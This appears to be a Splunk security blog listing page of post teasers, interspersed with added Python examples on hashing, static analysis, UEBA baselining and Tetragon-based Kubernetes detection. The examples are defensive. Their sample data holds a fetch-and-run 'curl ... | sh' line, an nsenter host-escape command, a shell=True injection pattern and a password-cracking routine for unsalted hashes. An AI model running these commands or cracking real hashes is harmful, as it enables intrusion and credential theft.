By Splunk
Nearly all CISOs report they are now responsible for AI governance and risk management, and they cite the growing sophistication of threat actor capabilities as their greatest risk. The vast majority say AI enables more security events to be reviewed.
Featured Post
The role of the tier 1 SOC analyst has always been critical. It's the function responsible for holding the line day to day and responding when incidents happen. It's also the training ground for new analysts, grounding them in a wide range of basics that prepare them to advance to tier 2. The role has never been static, but with the pace of change noticeably faster than ever before, the tier 1 SOC analyst role is evolving once again.
Let’s face it: humans are creatures of habit, and nothing rattles us quite like the prospect of change. (Just ask anyone who’s dared to swap out the office coffee brand—revolutions have started over less.) According to SHRM's research on change fatigue, today’s relentless pace of disruption is exhausting employees faster than a budget ergonomic chair. But here’s where it gets fascinating—where security, HR, and fraud analysis converge in ways you might not expect.
By Laiba Siddiqui
Hashing takes your data (like a password or file) and converts it into a fixed-length code that can’t be reversed. This makes it nearly impossible for attackers to figure out what the original data was, even if they steal the hash. In this article, I’ll explain hashing in detail, including its working principles, applications, the algorithms behind it, and how to apply it correctly.
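The properties described above, shown in working code. This is an added example for this page, not code from the article or its author; the inputs, the "leaked" hash and the word list are constructed for illustration. It also shows the caveat a practitioner needs alongside the one-way property: a hash cannot be reversed, but a fast unsalted hash of a guessable input can be recomputed for every guess, which is why passwords need a per-user salt and a deliberately slow key derivation function rather than a bare SHA-256.

```python
"""Hashing in practice: a fixed-length, one-way digest for integrity checks,
and why that alone is not enough for passwords.  Added example for this page;
the inputs and the word list below are constructed for illustration."""
import hashlib
import hmac
import secrets
from typing import Iterable, List, Optional


def sha256_hex(data: bytes) -> str:
    """SHA-256 always yields 32 bytes (64 hex chars), whatever the input size."""
    return hashlib.sha256(data).hexdigest()


def hash_stream(chunks: Iterable[bytes]) -> str:
    """Digest a large file or network stream chunk by chunk; same result as
    hashing the concatenation, without holding it all in memory."""
    h = hashlib.sha256()
    for chunk in chunks:
        h.update(chunk)
    return h.hexdigest()


def integrity_ok(chunks: Iterable[bytes], expected_hex: str) -> bool:
    """Verify a download against a published digest.  compare_digest avoids
    leaking how many leading characters matched through timing."""
    return hmac.compare_digest(hash_stream(chunks), expected_hex)


def bits_differing(a_hex: str, b_hex: str) -> int:
    """Avalanche effect: a one-character change flips about half of the 256 bits."""
    return bin(int(a_hex, 16) ^ int(b_hex, 16)).count("1")


def crack_unsalted(target_hex: str, wordlist: List[str]) -> Optional[str]:
    """The caveat the one-way property hides: the hash cannot be reversed, but a
    fast hash of a guessable input can be re-computed for every guess.  That is
    how leaked unsalted SHA-256/MD5 password hashes get recovered."""
    for guess in wordlist:
        if hmac.compare_digest(sha256_hex(guess.encode()), target_hex):
            return guess
    return None


# Iteration count for PBKDF2-HMAC-SHA256 per the OWASP Password Storage Cheat Sheet.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, deliberately slow hash.  A random 16-byte salt per user defeats
    precomputed tables, and the iteration count makes each guess expensive."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; never compare with ==."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("sha256('abc') =", sha256_hex(b"abc"))
    print("bits changed abc->abd:", bits_differing(sha256_hex(b"abc"), sha256_hex(b"abd")))
    leaked = sha256_hex(b"password123")  # constructed "leaked" unsalted hash
    print("recovered from unsalted hash:", crack_unsalted(leaked, ["letmein", "qwerty", "password123"]))
    stored = hash_password("correct horse battery staple")
    print("verify good:", verify_password("correct horse battery staple", stored),
          "verify bad:", verify_password("password123", stored))
```

The stored-password format carries its own iteration count so the cost can be raised later without breaking existing records; on the next successful login, rehash with the new count.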
By Huaibo Zhao
Earlier this year, we showcased how the Foundation-Sec-8B model’s chat capabilities can be leveraged within the Splunk App for Data Science and Deep Learning (DSDL) to summarize security events and provide detection suggestions. Building on its robust security expertise, Foundation-Sec-8B also supports zero-shot classification for a wide range of security tasks.
By Mick Baccio
Veterans in cybersecurity are just built different. They show up like a well-timed patch, quietly, decisively, and with an instinct for risk you can't fake. When you've owned mission-critical systems where the blast radius of a mistake is measured in lives, not log lines, you develop a rare sixth sense for risk that you simply can't teach in a bootcamp.
By Frank Myers
In the first part of our series, we examined the challenges facing state and local governments as they work to secure and maintain the availability of increasingly complex digital systems. Today, we turn our focus to how collaboration—powered by shared data platforms like Splunk—can enhance incident response and overall digital resilience.
By Olivia Henderson
In addition to Splunk’s recognition as an 11-time Leader in the 2025 Gartner Magic Quadrant for Security Information and Event Management (SIEM), we are honored to announce that Splunk has been ranked as the SIEM solution in all three Use Cases for the second consecutive time in the 2025 Gartner Critical Capabilities for Security Information and Event Management report.
Static code analysis wasn't always built into the development process. That meant most bugs were found during testing, after the code had already been merged, or later still in production. By that point, fixing issues was time-consuming, expensive, and risky: small mistakes slipped into production, security gaps widened, and quality suffered. Static analysis shifts all of that left by bringing security and quality checks into the earliest stages of development, before the code is merged.
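What "checking before merge" looks like mechanically, as an added example that is not part of the original page or of any particular analyzer: a small AST-based checker that walks a Python file and flags call patterns that should not get past review. The rule IDs, messages and the sample program are constructed here.

```python
"""A minimal static checker in the spirit of shift-left analysis: walk the
AST of a source file and flag call patterns that should not reach a merge.
Added example; the rules, IDs and sample program are constructed here and
are not from any specific analyzer."""
import ast
from typing import List, Tuple

Finding = Tuple[int, str, str]  # (line number, rule id, message)

SHELL_WRAPPERS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                  "subprocess.check_call", "subprocess.check_output"}


def call_name(node: ast.Call) -> str:
    """Render the callee as a dotted name: eval -> 'eval', subprocess.run -> 'subprocess.run'."""
    parts: List[str] = []
    func = node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def keyword_is_true(node: ast.Call, name: str) -> bool:
    return any(kw.arg == name and isinstance(kw.value, ast.Constant) and kw.value.value is True
               for kw in node.keywords)


class DangerousCallVisitor(ast.NodeVisitor):
    """Each rule looks only at the call's shape, so it runs before any test does."""

    def __init__(self) -> None:
        self.findings: List[Finding] = []

    def report(self, node: ast.AST, rule: str, msg: str) -> None:
        self.findings.append((node.lineno, rule, msg))

    def visit_Call(self, node: ast.Call) -> None:
        name = call_name(node)
        if name in {"eval", "exec"}:
            self.report(node, "PY001", f"{name}() executes arbitrary code")
        elif name in SHELL_WRAPPERS and keyword_is_true(node, "shell"):
            self.report(node, "PY002", f"{name}(shell=True): command injection if any argument is untrusted")
        elif name == "os.system":
            self.report(node, "PY002", "os.system() passes its argument to a shell")
        elif name in {"pickle.load", "pickle.loads"}:
            self.report(node, "PY003", f"{name}() deserializes arbitrary objects; never use it on untrusted data")
        elif name == "yaml.load" and not any(kw.arg == "Loader" for kw in node.keywords):
            self.report(node, "PY004", "yaml.load() without an explicit Loader; use yaml.safe_load()")
        self.generic_visit(node)  # keep walking: the call's arguments may contain more calls


def scan_source(source: str, filename: str = "<memory>") -> List[Finding]:
    visitor = DangerousCallVisitor()
    visitor.visit(ast.parse(source, filename))
    return sorted(visitor.findings)


# Constructed sample: a pre-merge change that a reviewer would otherwise have to catch by eye.
SAMPLE_SOURCE = '''\
import pickle, subprocess
def probe(expr, host, blob):
    limit = eval(expr)
    subprocess.run("ping -c 1 " + host, shell=True)
    subprocess.run(["ping", "-c", "1", host])
    return pickle.loads(blob), limit
'''

if __name__ == "__main__":
    for line, rule, msg in scan_source(SAMPLE_SOURCE, "probe.py"):
        print(f"probe.py:{line}: {rule} {msg}")
```

Line 5 of the sample, the list-form `subprocess.run`, produces no finding: the argument vector never passes through a shell, which is the shape the `shell=True` line should be rewritten to. Wiring `scan_source` into a pre-commit hook or CI job and failing the build on any finding is the shift-left step the paragraph describes.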
By Drew Gibson
I’m not one to blog, but speaking with clients, peers, and colleagues, I often hear statements like “SIEM is dead” or “this is the SOC of the future.” So what do they really mean? Honestly, I’m not entirely sure either — there are so many conflicting viewpoints and ways of addressing this.
By Splunk
OpenClaw is the hottest open-source AI tool, but it comes with massive security risks. In this video I'll give you the controls to mitigate these risks.
By Splunk
Insider threats thrive in ambiguity. They exist in the space where everyday work and malicious intent overlap. Traditional defenses are not built to detect that overlap; they are built to stop outsiders, not to question the behavior of insiders who look legitimate until the moment they are not. User and Entity Behavior Analytics (UEBA) fills that gap by establishing a behavioral perimeter around every identity and device.
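The "behavioral perimeter" idea reduced to its simplest working form, as an added example that is not part of the original post and is not Splunk UEBA's algorithm: learn what is normal for each identity from a history of successful logins (hosts, source addresses, hours), then score new logins by how far they depart from that baseline. The log lines, weights and threshold below are constructed for illustration.

```python
"""Behavioral baselining in the spirit of UEBA: learn what is normal for each
identity from successful logins, then score new logins by how far they depart
from it.  Added example with constructed log lines; the scoring is
illustrative and is not Splunk UEBA's algorithm."""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, Iterable, List, Set, Tuple

# Constructed auth events, one per line: timestamp then key=value fields.
HISTORY = [
    "2025-09-01T08:05:10Z user=alice host=fileserver01 src=10.1.5.20 result=success",
    "2025-09-01T09:12:44Z user=alice host=mail01 src=10.1.5.20 result=success",
    "2025-09-02T13:40:02Z user=alice host=fileserver01 src=10.1.5.20 result=success",
    "2025-09-03T17:55:31Z user=alice host=mail01 src=10.1.5.20 result=success",
    "2025-09-01T09:00:00Z user=bob host=build01 src=10.1.7.31 result=success",
    "2025-09-02T16:30:12Z user=bob host=build01 src=10.1.7.31 result=success",
    "2025-09-02T16:31:05Z user=bob host=build01 src=10.1.7.31 result=failure",
]
WINDOW = [
    "2025-09-10T10:02:17Z user=alice host=fileserver01 src=10.1.5.20 result=success",  # normal
    "2025-09-10T02:13:09Z user=alice host=dc01 src=10.1.9.77 result=success",          # new host, off-hours, new IP
    "2025-09-10T14:20:00Z user=bob host=hr-db01 src=10.1.7.31 result=success",         # new host only
    "2025-09-10T09:15:00Z user=bob host=build01 src=10.1.7.31 result=success",         # normal
]


@dataclass
class Baseline:
    hosts: Set[str] = field(default_factory=set)
    src_ips: Set[str] = field(default_factory=set)
    hours: Set[int] = field(default_factory=set)
    logins: int = 0


def parse(line: str) -> Dict[str, object]:
    ts, rest = line.split(" ", 1)
    ev: Dict[str, object] = dict(kv.split("=", 1) for kv in rest.split())
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def learn(lines: Iterable[str]) -> Dict[str, Baseline]:
    """Only successful logins shape what 'normal' looks like for an identity."""
    baselines: Dict[str, Baseline] = defaultdict(Baseline)
    for ev in map(parse, lines):
        if ev["result"] != "success":
            continue
        b = baselines[ev["user"]]
        b.hosts.add(ev["host"])
        b.src_ips.add(ev["src"])
        b.hours.add(ev["ts"].hour)
        b.logins += 1
    return dict(baselines)


def score(ev: Dict[str, object], baselines: Dict[str, Baseline]) -> Tuple[int, List[str]]:
    """Additive deviation score; each reason is kept so an analyst sees why."""
    b = baselines.get(ev["user"])
    if b is None:
        return 0, ["no baseline for identity"]  # a brand-new identity needs its own rule
    points, reasons = 0, []
    if ev["host"] not in b.hosts:
        points += 3
        reasons.append("first login to host")
    if ev["src"] not in b.src_ips:
        points += 2
        reasons.append("first login from source ip")
    if not (min(b.hours) <= ev["ts"].hour <= max(b.hours)):
        points += 2
        reasons.append("outside usual hours")
    return points, reasons


def detect(history: Iterable[str], window: Iterable[str], threshold: int = 4) -> List[Dict[str, object]]:
    baselines = learn(history)
    alerts = []
    for line in window:
        ev = parse(line)
        points, reasons = score(ev, baselines)
        if points >= threshold:
            alerts.append({"user": ev["user"], "host": ev["host"], "score": points,
                           "reasons": reasons, "event": line})
    return alerts


if __name__ == "__main__":
    for a in detect(HISTORY, WINDOW):
        print(f'{a["user"]} -> {a["host"]} score={a["score"]} ({", ".join(a["reasons"])})')
```

Bob's first login to hr-db01 scores 3 and stays below the threshold on its own; this is the ambiguity the paragraph describes, since a single new host is routine for many roles. It is the combination of deviations (new host, new source address, off-hours) that pushes alice's dc01 login over the line. A production system would also age the baseline, weight by how rare the host is across the whole population, and add a velocity rule for several first-time hosts in one window.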
By Splunk
We simulate real-world adversary behaviors inside a Kubernetes cluster to validate how Tetragon’s kernel-level visibility translates into detectable, high-fidelity security signals in Splunk. Each simulation maps to techniques in the MITRE ATT&CK for Containers framework and showcases how eBPF instrumentation allows us to catch what traditional agents often miss—for example, process lineage, syscall context, and Kubernetes workload-level attribution.
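How the signals named above (process lineage, pod attribution) become an ATT&CK-mapped detection, as an added example that is not part of the original post and not Splunk's or Tetragon's own code. The events are constructed in the shape of Tetragon's JSON export, which is an assumption to check against the field names your Tetragon version emits; the two rules and the ATT&CK mappings are mine.

```python
"""Turning eBPF process telemetry into ATT&CK-mapped signals from process
lineage and pod attribution.  Added example: the events are constructed in the
shape of Tetragon's JSON export (an assumption; check field names against your
Tetragon version) and the two rules are illustrative, not the blog's content."""
import itertools
import json
from typing import Dict, Iterable, List, Optional, Tuple

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash"}
WEB_SERVERS = {"/usr/sbin/nginx", "/usr/sbin/apache2", "/usr/bin/node", "/usr/local/bin/gunicorn"}

_pids = itertools.count(4000)


def make_event(binary: str, arguments: str, parent_binary: str,
               pod: Optional[Tuple[str, str]] = None, kind: str = "process_exec") -> str:
    """Build one constructed event line in the assumed Tetragon export shape."""
    proc: Dict[str, object] = {"pid": next(_pids), "uid": 0, "binary": binary, "arguments": arguments}
    if pod is not None:
        namespace, name = pod
        proc["pod"] = {"namespace": namespace, "name": name, "container": {"name": name.split("-")[0]}}
    return json.dumps({kind: {"process": proc, "parent": {"pid": 17, "binary": parent_binary}},
                       "node_name": "worker-1", "time": "2025-10-02T09:14:33Z"})


# Constructed events (one JSON object per line, as Tetragon's stdout/file exporter writes them).
EVENTS = [
    make_event("/bin/sh", '-c "curl -s http://203.0.113.9/x | sh"', "/usr/sbin/nginx",
               pod=("web", "shop-7d9f4-x2kq")),                                   # web server spawns a shell
    make_event("/usr/sbin/nginx", "-g daemon off;", "/usr/bin/containerd-shim-runc-v2",
               pod=("web", "shop-7d9f4-x2kq")),                                   # normal container start
    make_event("/usr/bin/nsenter", "-t 1 -m -u -i -n -- /bin/bash", "/bin/bash",
               pod=("ops", "debug-0")),                                           # enter host PID 1 namespaces
    make_event("/bin/bash", "-l", "/usr/sbin/sshd"),                              # node-level, no pod
    make_event("/bin/sh", "", "/usr/sbin/nginx", pod=("web", "shop-7d9f4-x2kq"),
               kind="process_exit"),                                              # not an exec event
]


def parse_exec(line: str) -> Optional[dict]:
    """Keep only exec events; Tetragon also emits process_exit and process_kprobe."""
    return json.loads(line).get("process_exec")


def lineage(ev: dict) -> str:
    return f'{ev.get("parent", {}).get("binary", "?")} -> {ev["process"]["binary"]}'


def targets_host_init(arguments: str) -> bool:
    """True for `nsenter -t 1 ...` or `--target=1`, i.e. the host's init process."""
    toks = arguments.split()
    for i, tok in enumerate(toks):
        if tok == "--target=1":
            return True
        if tok in ("-t", "--target") and i + 1 < len(toks) and toks[i + 1] == "1":
            return True
    return False


def evaluate(ev: dict) -> Optional[Dict[str, str]]:
    """Pod-scoped rules: lineage tells us *who* spawned the process, the pod
    block tells us *which workload* it belongs to; both go into the alert."""
    proc, parent = ev["process"], ev.get("parent", {})
    pod = proc.get("pod")
    if pod is None:
        return None  # process runs on the node, not in a workload; these rules do not apply
    workload = f'{pod["namespace"]}/{pod["name"]}'
    if proc["binary"] in SHELLS and parent.get("binary") in WEB_SERVERS:
        technique, title = "T1059.004", "Unix shell spawned by a web server process"
    elif proc["binary"].endswith("/nsenter") and targets_host_init(proc.get("arguments", "")):
        technique, title = "T1611", "nsenter into the host's PID 1 namespaces"
    else:
        return None
    return {"technique": technique, "title": title, "workload": workload,
            "lineage": lineage(ev), "arguments": proc.get("arguments", "")}


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    alerts = []
    for line in lines:
        ev = parse_exec(line)
        hit = evaluate(ev) if ev is not None else None
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for a in scan(EVENTS):
        print(f'{a["technique"]} {a["workload"]}: {a["lineage"]}  [{a["title"]}]')
```

The fourth event is the point about attribution: a shell under sshd on the node is not a workload event, and an agent that only sees "bash started" cannot tell the two apart, whereas the pod block in the exec event lets the rule stay scoped to the container it actually fired in.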
By Splunk
Discover how SPL2 (Splunk Processing Language 2) is transforming the way organizations manage data at scale. In this demo, we dive deep into how SPL2 addresses modern data challenges by offering a unified, SQL-like syntax and powerful new tools like the Module Editor. With syntax that’s instantly familiar to current users, SPL2 removes barriers to adoption and lets teams leverage its power from day one.
By Splunk
MSIXBuilder transforms what was traditionally a complex, multi-tool process into a single automated workflow that mirrors actual attacker techniques. By automatically handling certificate lifecycle management, dependency resolution, and package signing, the tool removes the technical barriers that previously prevented security teams from creating realistic test scenarios. This means defenders can quickly generate both signed and unsigned MSIX packages to validate their AppXDeployment event log coverage, confirm detection rules, and build detection coverage that actually works against real-world threats.
By Splunk
Learn how Splunk Attack Analyzer saves analysts time and enhances SOC efficiency by automatically analyzing complex attack chains.
By Splunk
The Splunk Enterprise Security Content Update (ESCU) app is a powerful resource developed by the Splunk Threat Research Team. It provides out-of-the-box detection analytics mapped to the MITRE ATT&CK framework and tailored to various platforms such as Windows, Linux, and cloud environments. While installing ESCU is straightforward, operationalizing the content - meaning tuning, enabling, and maintaining it for real-world use - requires a few deliberate steps.
By Splunk
This demo video showcases XWorm attacks and the Splunk detections that find the different ways it executes on a host.
By Splunk
The Splunk Threat Research Team created a simple script to automatically extract the hidden stub modules from the resource entry images. This video demo shows how the tool extracts the hidden payload from those images in non-corrupted .NET loaders.
By Splunk
The hype around artificial intelligence (AI) and machine learning (ML) has exploded, sometimes overshadowing the real uses and innovations happening every day at organizations across the globe. The reality is that applying AI and ML to data-dependent challenges presents an opportunity for better security, faster innovation and overall improved efficiency.
By Splunk
Cyberattacks are top of mind for organizations across the globe. In fact, 62 percent of firms are being attacked at least weekly and 45 percent are experiencing a rise in the number of security threats. But do organizations have the processes in place to investigate and effectively respond to these incidents? IDC recently surveyed security decision makers at 600 organizations to understand the state of security operations today.
By Splunk
Do you have a plan for cybersecurity? Digital technology is touching every aspect of our lives, which is giving bad actors unlimited runway to create new threats daily. It's this atmosphere that makes it imperative that organizations are prepared, informed and actively hunting for adversaries.
By Splunk
How can you utilize machine data to be prepared for the General Data Protection Regulation of the European Union?
By Splunk
Security incidents can happen without warning, and they often go undetected for long periods of time. Organizations struggle to identify incidents because teams work in silos, or because the volume of alerts is overwhelming and it is hard to separate the signals from the noise.
By Splunk
A security information and event management (SIEM) solution is like the radar system that pilots and air traffic controllers use. Without one, enterprise IT is flying blind. Although security appliances and system software are good at catching and logging isolated attacks and anomalous behavior, today's most serious threats are distributed, acting in concert across multiple systems and using advanced evasion techniques to avoid detection.
By Splunk
All data is security relevant and defending against threats involves every department in a company. With cyberthreats and bad actors constantly evolving, it is imperative for everyone in an organization to come together to identify and protect critical data.
By Splunk
Recent cyberattacks have made it clear that organizations of all sizes need to focus on a holistic and cohesive security strategy. Security operations centers (SOCs) have become a focal point in this effort, consolidating the right people, processes and technology to mitigate and remediate attacks.
By Splunk
Current IT security tools and mindsets are no longer adequate to meet the scope and complexity of today's threats. Internet security has evolved over the last ten years, but advanced persistent threats and increasingly sophisticated malware have fundamentally changed the way security teams must think about these threats and the tools they use for detective controls.